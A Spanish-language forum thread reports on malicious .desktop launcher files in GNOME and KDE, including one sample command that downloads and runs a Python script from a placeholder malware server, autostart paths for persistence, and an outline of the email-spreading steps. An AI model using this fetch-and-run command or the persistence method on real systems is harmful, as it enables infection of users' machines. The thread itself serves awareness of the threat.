• Registrarse
  • Iniciar sesión


  • Resultados 1 al 3 de 3

    Script maliciosos para GNOME y KDE

    Script maliciosos para GNOME y KDE foobar publicó recientemente en su bitácora personal un artículo titulado Cómo escribir un virus para Linux en 5 segundos , detallando la infección con equipamiento lógico maligno (malware) a ...

          
    1. #1
      Usuario Avatar de Cratus
      Registrado
      nov 2006
      Ubicación
      ::1
      Mensajes
      1.687

      Script maliciosos para GNOME y KDE

      Script maliciosos para GNOME y KDE



      foobar publicó recientemente en su bitácora personal un artículo titulado Cómo escribir un virus para Linux en 5 segundos, detallando la infección con equipamiento lógico maligno (malware) a través del formato de los ficheros .desktop que utilizan GNOME y KDE. Aunque esto está lejos de ser una nueva amenaza, es un riesgo potencial, como fue discutido en 2006, que a la fecha carece de una solución para lidiar con el problema.



      Linux Weekly News está discutiendo de manera amplia el problema, que de cierta manera permite a un atacante disfrazar un fichero .desktop con el icono de Inicio o cualquier programa. Básicamente el artículo de foobar sugiere explotar la confianza que tiene los usuarios de GNU/Linux en el sistemas, pero sin subestimarlos, utilizando ficheros .desktop que se disfrazan con iconos de otras aplicaciones, y que ejecutan guiones remotos, como el siguiente ejemplo:




      Código:
      % bash -c "curl http://www.some_malware_server.org/s.py -o /tmp/s.py; python /tmp/s.py"



      El artículo también sugiere utilizar



      Código:
      ~/.config/autostart y ~/.kde/Autostart


      para asegurarse que el guión se ejecute automáticamente en cada inicio de sesión.


      La guía resumida, sugiere lo siguiente:

      • Escribir un código a la elección del atacante.
      • Implementar en éste último la capacidad de instalarse e iniciarse a si mismo.
      • Crear un fichero lanzador de escritorio para ejecutar el código.
      • Adjuntar el código a un correo electrónico.
      • Enviar el correo electrónico a cuantas direcciones de correo se pueda.


      Todo esto ha puesto en alerta a muchos desarrolladores, que ahora comienzan a pensar y preocuparse de las medidas a utilizar. Este es posiblemente una buena excusa para volver a reactivar SELinux en los escritorios donde fue desactivado para mejorar rendimiento, y comenzar a pensar como implementar un antivirus del mismo modo que se hace en Windows, solo por sanidad mental. En fin, los desarrolladores han vuelto a tocar el tema, y es casi seguro que se hará algo al respecto en el futuro cercano (la menos eso esperamos).




    2. #2
      Usuario Avatar de Vladikavkaz
      Registrado
      dic 2005
      Ubicación
      Mexico
      Mensajes
      24

      Re: Script maliciosos para GNOME y KDE

      Lo bueno que a mi entorno preferido XFCE, no le afecta

    3. #3
      Usuario Avatar de Cratus
      Registrado
      nov 2006
      Ubicación
      ::1
      Mensajes
      1.687

      Re: Script maliciosos para GNOME y KDE

      Cita Originalmente publicado por Vladikavkaz Ver Mensaje
      Lo bueno que a mi entorno preferido XFCE, no le afecta
      si, eso es cierto.



      Pero es algo que no tardaría mucho en aparecer, si queremos que las cosas mas faciles siempre va a haber un precio que pagar.


      Saludos.